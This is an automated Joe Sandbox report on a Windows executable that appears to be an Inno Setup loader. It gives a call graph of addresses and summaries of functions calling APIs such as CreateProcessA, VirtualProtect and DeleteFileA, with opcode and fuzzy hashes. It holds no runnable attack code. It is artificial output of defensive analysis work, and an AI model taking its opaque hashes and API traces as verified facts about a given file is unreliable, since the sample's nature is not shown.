6656->6661 6657->6656 6659 40ac1a 6658->6659 6660 40ac0f DestroyWindow 6658->6660 6662 40ac42 6659->6662 6663 40357c 4 API calls 6659->6663 6660->6659 6661->6658 6664 40ac38 6663->6664 6665 4025ac 4 API calls 6664->6665 6665->6662 6877 405ba2 6879 405ba4 6877->6879 6878 405be0 6880 405940 19 API calls 6878->6880 6879->6878 6881 405bf7 6879->6881 6882 405bda 6879->6882 6890 405bf3 6880->6890 6885 404cdc 19 API calls 6881->6885 6882->6878 6883 405c4c 6882->6883 6884 4059b0 33 API calls 6883->6884 6884->6890 6886 405c20 6885->6886 6888 4059b0 33 API calls 6886->6888 6887 403198 4 API calls 6889 405c86 6887->6889 6888->6890 6890->6887 6891 408da4 6892 408dc8 6891->6892 6893 408c80 18 API calls 6892->6893 6894 408dd1 6893->6894 6666 402caa 6667 403154 4 API calls 6666->6667 6668 402caf 6667->6668 6909 4011aa 6910 4011ac GetStdHandle 6909->6910 6669 4028ac 6670 402594 18 API calls 6669->6670 6671 4028b6 6670->6671 4981 40aab4 4982 40aab8 SetLastError 4981->4982 5013 409648 GetLastError 4982->5013 4985 40aad2 4987 40aadc CreateWindowExA SetWindowLongA 4985->4987 5026 405194 4987->5026 4991 40ab6d 4992 4032fc 18 API calls 4991->4992 4993 40ab7a 4992->4993 5043 406b7c GetCommandLineA 4993->5043 4996 4032fc 18 API calls 4997 40ab8f 4996->4997 5048 4099ec 4997->5048 4999 40aba1 5001 40abb4 4999->5001 5069 4098cc 4999->5069 5002 40abd4 5001->5002 5003 40abed 5001->5003 5075 4094d8 5002->5075 5005 40ac06 5003->5005 5008 40ac00 RemoveDirectoryA 5003->5008 5006 40ac1a 5005->5006 5007 40ac0f DestroyWindow 5005->5007 5012 40ac42 5006->5012 5083 40357c 5006->5083 5007->5006 5008->5005 5010 40ac38 5096 4025ac 5010->5096 5100 404c94 5013->5100 5021 4096c3 5115 4031b8 5021->5115 5027 4051a8 33 API calls 5026->5027 5028 4051a3 5027->5028 5029 4032fc 5028->5029 5030 403300 5029->5030 5031 40333f 5029->5031 5032 4031e8 5030->5032 5033 40330a 5030->5033 5031->4991 5039 403254 18 API calls 5032->5039 5040 4031fc 5032->5040 5034 403334 5033->5034 5035 40331d 5033->5035 5036 4034f0 18 API calls 5034->5036 5276 4034f0 5035->5276 5042 403322 5036->5042 5037 403228 5037->4991 5039->5040 5040->5037 5041 4025ac 4 API calls 5040->5041 5041->5037 5042->4991 5302 406af0 5043->5302 5045 406ba1 5046 403198 4 API calls 5045->5046 5047 406bbf 5046->5047 5047->4996 5316 4033b4 5048->5316 5050 409a27 5051 409a59 CreateProcessA 5050->5051 5052 409a65 5051->5052 5053 409a6c CloseHandle 5051->5053 5054 409648 35 API calls 5052->5054 5055 409a75 5053->5055 5054->5053 5056 4099c0 TranslateMessage DispatchMessageA PeekMessageA 5055->5056 5057 409a7a MsgWaitForMultipleObjects 5056->5057 5057->5055 5058 409a91 5057->5058 5059 4099c0 TranslateMessage DispatchMessageA PeekMessageA 5058->5059 5060 409a96 GetExitCodeProcess CloseHandle 5059->5060 5061 409ab6 5060->5061 5062 403198 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5061->5062 5063 409abe 5062->5063 5063->4999 5064 402f24 5065 403154 4 API calls 5064->5065 5066 402f29 5065->5066 5322 402bcc 5066->5322 5068 402f51 5068->5068 5070 40990e 5069->5070 5071 4098d4 5069->5071 5070->5001 5071->5070 5072 403420 18 API calls 5071->5072 5073 409908 5072->5073 5325 408e80 5073->5325 5076 409532 5075->5076 5080 4094eb 5075->5080 5076->5003 5077 4094f3 Sleep 5077->5080 5078 409503 Sleep 5078->5080 5080->5076 5080->5077 5080->5078 5081 40951a GetLastError 5080->5081 5348 408fbc 5080->5348 5081->5076 5082 409524 GetLastError 5081->5082 5082->5076 5082->5080 5086 403591 5083->5086 5091 4035a0 5083->5091 5084 4035b1 5087 403198 4 API calls 5084->5087 5085 4035b8 5088 4031b8 4 API calls 5085->5088 5089 4035d0 5086->5089 5090 40359b 5086->5090 5093 4035b6 5086->5093 5087->5093 5088->5093 5089->5093 5094 40357c 4 API calls 5089->5094 5090->5091 5092 4035ec 5090->5092 5091->5084 5091->5085 5092->5093 5365 403554 5092->5365 5093->5010 5094->5089 5097 4025b0 5096->5097 5099 4025ba 5096->5099 5098 403154 4 API calls 5097->5098 5097->5099 5098->5099 5099->5012 5123 4051a8 5100->5123 5103 407284 FormatMessageA 5104 4072aa 5103->5104 5105 403278 18 API calls 5104->5105 5106 4072c7 5105->5106 5107 408da8 5106->5107 5108 408dc8 5107->5108 5266 408c80 5108->5266 5111 405890 5112 405897 5111->5112 5113 4031e8 18 API calls 5112->5113 5114 4058af 5113->5114 5114->5021 5117 4031be 5115->5117 5116 4031e3 5119 403198 5116->5119 5117->5116 5118 4025ac 4 API calls 5117->5118 5118->5117 5120 4031b7 5119->5120 5121 40319e 5119->5121 5120->4985 5120->5064 5121->5120 5122 4025ac 4 API calls 5121->5122 5122->5120 5124 4051c5 5123->5124 5131 404e58 5124->5131 5127 4051f1 5136 403278 5127->5136 5133 404e73 5131->5133 5132 404e85 5132->5127 5141 404be4 5132->5141 5133->5132 5144 404f7a 5133->5144 5151 404e4c 5133->5151 5137 403254 18 API calls 5136->5137 5138 403288 5137->5138 5139 403198 4 API calls 5138->5139 5140 4032a0 5139->5140 5140->5103 5258 405940 5141->5258 5143 404bf5 5143->5127 5145 404f8b 5144->5145 5149 404fd9 5144->5149 5148 40505f 5145->5148 5145->5149 5147 404ff7 5147->5133 5148->5147 5158 404e38 5148->5158 5149->5147 5154 404df4 5149->5154 5152 403198 4 API calls 5151->5152 5153 404e56 5152->5153 5153->5133 5155 404e02 5154->5155 5161 404bfc 5155->5161 5157 404e30 5157->5149 5188 4039a4 5158->5188 5164 4059b0 5161->5164 5163 404c15 5163->5157 5165 4059be 5164->5165 5174 404cdc LoadStringA 5165->5174 5168 405194 33 API calls 5169 4059f6 5168->5169 5177 4031e8 5169->5177 5172 4031b8 4 API calls 5173 405a1b 5172->5173 5173->5163 5175 403278 18 API calls 5174->5175 5176 404d09 5175->5176 5176->5168 5178 4031ec 5177->5178 5181 4031fc 5177->5181 5178->5181 5183 403254 5178->5183 5179 403228 5179->5172 5181->5179 5182 4025ac 4 API calls 5181->5182 5182->5179 5184 403274 5183->5184 5185 403258 5183->5185 5184->5181 5186 402594 18 API calls 5185->5186 5187 403261 5186->5187 5187->5181 5189 4039ab 5188->5189 5194 4038b4 5189->5194 5191 4039cb 5192 403198 4 API calls 5191->5192 5193 4039d2 5192->5193 5193->5147 5195 4038d5 5194->5195 5196 4038c8 5194->5196 5198 403934 5195->5198 5199 4038db 5195->5199 5222 403780 5196->5222 5200 403993 5198->5200 5201 40393b 5198->5201 5202 4038e1 5199->5202 5203 4038ee 5199->5203 5205 4037f4 3 API calls 5200->5205 5206 403941 5201->5206 5207 40394b 5201->5207 5229 403894 5202->5229 5204 403894 6 API calls 5203->5204 5210 4038fc 5204->5210 5208 4038d0 5205->5208 5244 403864 5206->5244 5212 4037f4 3 API calls 5207->5212 5208->5191 5234 4037f4 5210->5234 5214 40395d 5212->5214 5216 403864 23 API calls 5214->5216 5215 403917 5240 40374c 5215->5240 5217 403976 5216->5217 5219 40374c VariantClear 5217->5219 5221 40398b 5219->5221 5220 40392c 5220->5191 5221->5191 5223 4037f0 5222->5223 5228 403744 5222->5228 5223->5208 5224 403793 VariantClear 5224->5228 5225 4037ab 5225->5208 5226 4037dc VariantCopyInd 5226->5223 5226->5228 5227 403198 4 API calls 5227->5228 5228->5222 5228->5224 5228->5225 5228->5226 5228->5227 5249 4036b8 5229->5249 5232 40374c VariantClear 5233 4038a9 5232->5233 5233->5208 5235 403845 VariantChangeTypeEx 5234->5235 5236 40380a VariantChangeTypeEx 5234->5236 5238 403832 5235->5238 5237 403826 5236->5237 5239 40374c VariantClear 5237->5239 5238->5215 5239->5238 5241 403766 5240->5241 5242 403759 5240->5242 5241->5220 5242->5241 5243 403779 VariantClear 5242->5243 5243->5220 5255 40369c SysStringLen 5244->5255 5247 40374c VariantClear 5248 403882 5247->5248 5248->5208 5250 4036cb 5249->5250 5251 403706 MultiByteToWideChar SysAllocStringLen MultiByteToWideChar 5250->5251 5252 4036db 5250->5252 5253 40372e 5251->5253 5254 4036ed MultiByteToWideChar SysAllocStringLen 5252->5254 5253->5232 5254->5253 5256 403610 21 API calls 5255->5256 5257 4036b3 5256->5257 5257->5247 5259 40594c 5258->5259 5260 404cdc 19 API calls 5259->5260 5261 405972 5260->5261 5262 4031e8 18 API calls 5261->5262 5263 40597d 5262->5263 5264 403198 4 API calls 5263->5264 5265 405992 5264->5265 5265->5143 5267 403198 4 API calls 5266->5267 5269 408cb1 5266->5269 5267->5269 5268 4031b8 4 API calls 5270 408d69 5268->5270 5271 408cc8 5269->5271 5272 403278 18 API calls 5269->5272 5274 4032fc 18 API calls 5269->5274 5275 408cdc 5269->5275 5270->5111 5273 4032fc 18 API calls 5271->5273 5272->5269 5273->5275 5274->5269 5275->5268 5277 4034fd 5276->5277 5284 40352d 5276->5284 5279 403526 5277->5279 5280 403509 5277->5280 5278 403198 4 API calls 5282 403517 5278->5282 5281 403254 18 API calls 5279->5281 5285 4025c4 5280->5285 5281->5284 5282->5042 5284->5278 5287 4025ca 5285->5287 5286 4025dc 5286->5282 5286->5286 5287->5286 5289 403154 5287->5289 5290 403164 5289->5290 5291 40318c TlsGetValue 5289->5291 5290->5286 5292 403196 5291->5292 5293 40316f 5291->5293 5292->5286 5297 40310c 5293->5297 5295 403174 TlsGetValue 5296 403184 5295->5296 5296->5286 5298 403120 LocalAlloc 5297->5298 5299 403116 5297->5299 5300 40313e TlsSetValue 5298->5300 5301 403132 5298->5301 5299->5298 5300->5301 5301->5295 5303 406b1c 5302->5303 5304 403278 18 API calls 5303->5304 5305 406b29 5304->5305 5312 403420 5305->5312 5307 406b31 5308 4031e8 18 API calls 5307->5308 5309 406b49 5308->5309 5310 403198 4 API calls 5309->5310 5311 406b6b 5310->5311 5311->5045 5313 403426 5312->5313 5315 403437 5312->5315 5314 403254 18 API calls 5313->5314 5313->5315 5314->5315 5315->5307 5317 4033bc 5316->5317 5318 403254 18 API calls 5317->5318 5319 4033cf 5318->5319 5320 4031e8 18 API calls 5319->5320 5321 4033f7 5320->5321 5323 402bd5 RaiseException 5322->5323 5324 402be6 5322->5324 5323->5324 5324->5068 5326 408e8e 5325->5326 5328 408ea6 5326->5328 5338 408e18 5326->5338 5329 408e18 18 API calls 5328->5329 5330 408eca 5328->5330 5329->5330 5341 407918 5330->5341 5332 408ee5 5333 408e18 18 API calls 5332->5333 5335 408ef8 5332->5335 5333->5335 5334 408e18 18 API calls 5334->5335 5335->5334 5336 403278 18 API calls 5335->5336 5337 408f27 5335->5337 5336->5335 5337->5070 5339 405890 18 API calls 5338->5339 5340 408e29 5339->5340 5340->5328 5344 4078c4 5341->5344 5345 4078d6 5344->5345 5346 4078e7 5344->5346 5347 4078db InterlockedExchange 5345->5347 5346->5332 5347->5346 5356 408f70 5348->5356 5350 408fd2 5351 408fd6 5350->5351 5352 408ff2 DeleteFileA GetLastError 5350->5352 5351->5080 5353 409010 5352->5353 5362 408fac 5353->5362 5357 408f7a 5356->5357 5358 408f7e 5356->5358 5357->5350 5359 408fa0 SetLastError 5358->5359 5360 408f87 Wow64DisableWow64FsRedirection 5358->5360 5361 408f9b 5359->5361 5360->5361 5361->5350 5363 408fb1 Wow64RevertWow64FsRedirection 5362->5363 5364 408fbb 5362->5364 5363->5364 5364->5080 5366 403566 5365->5366 5368 403578 5366->5368 5369 403604 5366->5369 5368->5092 5370 40357c 5369->5370 5375 40359b 5370->5375 5376 4035a0 5370->5376 5378 4035b6 5370->5378 5379 4035d0 5370->5379 5371 4035b1 5373 403198 4 API calls 5371->5373 5372 4035b8 5374 4031b8 4 API calls 5372->5374 5373->5378 5374->5378 5375->5376 5377 4035ec 5375->5377 5376->5371 5376->5372 5377->5378 5381 403554 4 API calls 5377->5381 5378->5366 5379->5378 5380 40357c 4 API calls 5379->5380 5380->5379 5381->5377 6672 401ab9 6673 401a96 6672->6673 6674 401aa9 RtlDeleteCriticalSection 6673->6674 6675 401a9f RtlLeaveCriticalSection 6673->6675 6675->6674

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 132 409b78-409b9c GetSystemInfo VirtualQuery 133 409ba2 132->133 134 409c2c-409c33 132->134 135 409c21-409c26 133->135 135->134 136 409ba4-409bab 135->136 137 409c0d-409c1f VirtualQuery 136->137 138 409bad-409bb1 136->138 137->134 137->135 138->137 139 409bb3-409bbb 138->139 140 409bcc-409bdd VirtualProtect 139->140 141 409bbd-409bc0 139->141 143 409be1-409be3 140->143 144 409bdf 140->144 141->140 142 409bc2-409bc5 141->142 142->140 145 409bc7-409bca 142->145 146 409bf2-409bf5 143->146 144->143 145->140 145->143 147 409be5-409bee call 409b70 146->147 148 409bf7-409bf9 146->148 147->146 148->137 149 409bfb-409c08 VirtualProtect 148->149 149->137
                                                                                  APIs
                                                                                  • GetSystemInfo.KERNEL32(?), ref: 00409B8A
                                                                                  • VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409B95
                                                                                  • VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409BD6
                                                                                  • VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409C08
                                                                                  • VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409C18
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Virtual$ProtectQuery$InfoSystem
                                                                                  • String ID:
                                                                                  • API String ID: 2441996862-0
                                                                                  • Opcode ID: 69cc1b0b9b744b29044eea84e4744ba7a66f7205e02ae19cc0529fdcfa929845
                                                                                  • Instruction ID: 4a1d84bb43d4a47cf168f169447d483ed62c711ee8ccb48f5bfbfd053dbeaed9
                                                                                  • Opcode Fuzzy Hash: 69cc1b0b9b744b29044eea84e4744ba7a66f7205e02ae19cc0529fdcfa929845
                                                                                  • Instruction Fuzzy Hash: D421A1B16043006BDA309AA99C85E57B7E8AF45360F144C2BFA99E72C3D239FC40C669
                                                                                  APIs
                                                                                  • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoLocale
                                                                                  • String ID:
                                                                                  • API String ID: 2299586839-0
                                                                                  • Opcode ID: 08facca5f8c818d7ae0117448837c5e97f15c9e55cb3aedc2694e0bc5091a832
                                                                                  • Instruction ID: 1248db9972fbf410c55bf070b604c98f5d62b90992f8f49b6b6440a9954d2c50
                                                                                  • Opcode Fuzzy Hash: 08facca5f8c818d7ae0117448837c5e97f15c9e55cb3aedc2694e0bc5091a832
                                                                                  • Instruction Fuzzy Hash: E2E0927170021427D710A9A99C86AEB725CEB58310F0002BFB904E73C6EDB49E804AED

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040A618), ref: 00404582
                                                                                  • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040458F
                                                                                  • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004045A5
                                                                                  • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004045BB
                                                                                  • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,0040A618), ref: 004045C6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$HandleModulePolicyProcess
                                                                                  • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                                  • API String ID: 3256987805-3653653586
                                                                                  • Opcode ID: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                                  • Instruction ID: 1f393095ee8ecda9e1e01b6ca7d440447e938bbc9796bcd5dbe8d266940e5f64
                                                                                  • Opcode Fuzzy Hash: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                                  • Instruction Fuzzy Hash: 5FE02DD03813013AEA5032F20D83B2B20884AD0B49B2414377F25B61C3EDBDDA40587E

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • SetLastError.KERNEL32 ref: 0040AAC1
                                                                                    • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B244,?,020D1D6C), ref: 0040966C
                                                                                  • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040AAFE
                                                                                  • SetWindowLongA.USER32(00020434,000000FC,00409960), ref: 0040AB15
                                                                                  • RemoveDirectoryA.KERNEL32(00000000,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC01
                                                                                  • DestroyWindow.USER32(00020434,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC15
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$ErrorLast$CreateDestroyDirectoryLongRemove
                                                                                  • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                  • API String ID: 3757039580-3001827809
                                                                                  • Opcode ID: 512ba3d6f2e9f1c3867d88fe9cc8f5790ae5845b184f1ae6f41adfa2939ac233
                                                                                  • Instruction ID: be79b44adbed8f80b53e5612ba2c07cab25871a7655baedeeb07d74425ea1546
                                                                                  • Opcode Fuzzy Hash: 512ba3d6f2e9f1c3867d88fe9cc8f5790ae5845b184f1ae6f41adfa2939ac233
                                                                                  • Instruction Fuzzy Hash: 83410070604204DBDB10EBA9EE89B9D37A5EB49304F10467FF114B72E2D7B89845CB9D

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,0040A62C), ref: 004090C4
                                                                                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090CA
                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,0040A62C), ref: 004090DE
                                                                                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090E4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressHandleModuleProc
                                                                                  • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                  • API String ID: 1646373207-2130885113
                                                                                  • Opcode ID: 0414f1d66f28dc470df4633e5994336701384173b3f6f66b470f3ad827f759f7
                                                                                  • Instruction ID: 214dda5481ef482ebe311b1329301f35405b1013d97e3062c17ffb2c8286d57d
                                                                                  • Opcode Fuzzy Hash: 0414f1d66f28dc470df4633e5994336701384173b3f6f66b470f3ad827f759f7
                                                                                  • Instruction Fuzzy Hash: 21017C70748342AEFB00BB76DD4AB163A68E785704F60457BF640BA2D3DABD4C04D66E

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040AAFE
                                                                                  • SetWindowLongA.USER32(00020434,000000FC,00409960), ref: 0040AB15
                                                                                    • Part of subcall function 00406B7C: GetCommandLineA.KERNEL32(00000000,00406BC0,?,?,?,?,00000000,?,0040AB86,?), ref: 00406B94
                                                                                    • Part of subcall function 004099EC: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020D1D6C,00409AD8,00000000,00409ABF), ref: 00409A5C
                                                                                    • Part of subcall function 004099EC: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020D1D6C,00409AD8,00000000), ref: 00409A70
                                                                                    • Part of subcall function 004099EC: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A89
                                                                                    • Part of subcall function 004099EC: GetExitCodeProcess.KERNEL32(?,0040B244), ref: 00409A9B
                                                                                    • Part of subcall function 004099EC: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020D1D6C,00409AD8), ref: 00409AA4
                                                                                  • RemoveDirectoryA.KERNEL32(00000000,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC01
                                                                                  • DestroyWindow.USER32(00020434,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC15
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$CloseCreateHandleProcess$CodeCommandDestroyDirectoryExitLineLongMultipleObjectsRemoveWait
                                                                                  • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                  • API String ID: 3586484885-3001827809
                                                                                  • Opcode ID: abbbb59459200108d21b408613378a390e3e047840070f8330146cd7c6fc736f
                                                                                  • Instruction ID: 3ba592a6bb5a586105fd12ff7794ab8e81bfb13978b6693ff680cbbbd79f3ebd
                                                                                  • Opcode Fuzzy Hash: abbbb59459200108d21b408613378a390e3e047840070f8330146cd7c6fc736f
                                                                                  • Instruction Fuzzy Hash: EF410B71604204DFD714EBA9EE89B5A37B5EB48314F20467BF104BB2E1D7B8A844CB9D

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020D1D6C,00409AD8,00000000,00409ABF), ref: 00409A5C
                                                                                  • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020D1D6C,00409AD8,00000000), ref: 00409A70
                                                                                  • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A89
                                                                                  • GetExitCodeProcess.KERNEL32(?,0040B244), ref: 00409A9B
                                                                                  • CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020D1D6C,00409AD8), ref: 00409AA4
                                                                                    • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B244,?,020D1D6C), ref: 0040966C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                                                  • String ID: D
                                                                                  • API String ID: 3356880605-2746444292
                                                                                  • Opcode ID: aadf6f075de5bdb3c28d757ddccd10dd30f6bbfdbbad62eb54c24073370c977f
                                                                                  • Instruction ID: b58d0f6e2b8975977e6c7b71aada5392bea55c03070ce9fad3dcef5aa6d4018a
                                                                                  • Opcode Fuzzy Hash: aadf6f075de5bdb3c28d757ddccd10dd30f6bbfdbbad62eb54c24073370c977f
                                                                                  • Instruction Fuzzy Hash: EE1142B16402486EDB00EBE6CC42F9EB7ACEF49714F50013BB604F72C6DA785D048A69

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 116 401918-40193a RtlInitializeCriticalSection 117 401946-40197c call 4012dc * 3 LocalAlloc 116->117 118 40193c-401941 RtlEnterCriticalSection 116->118 125 4019ad-4019c1 117->125 126 40197e 117->126 118->117 130 4019c3-4019c8 RtlLeaveCriticalSection 125->130 131 4019cd 125->131 127 401983-401995 126->127 127->127 129 401997-4019a6 127->129 129->125 130->131
                                                                                  APIs
                                                                                  • RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                                  • RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                                  • LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                                  • RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                  • String ID: 4Rt$DRt
                                                                                  • API String ID: 730355536-192030282
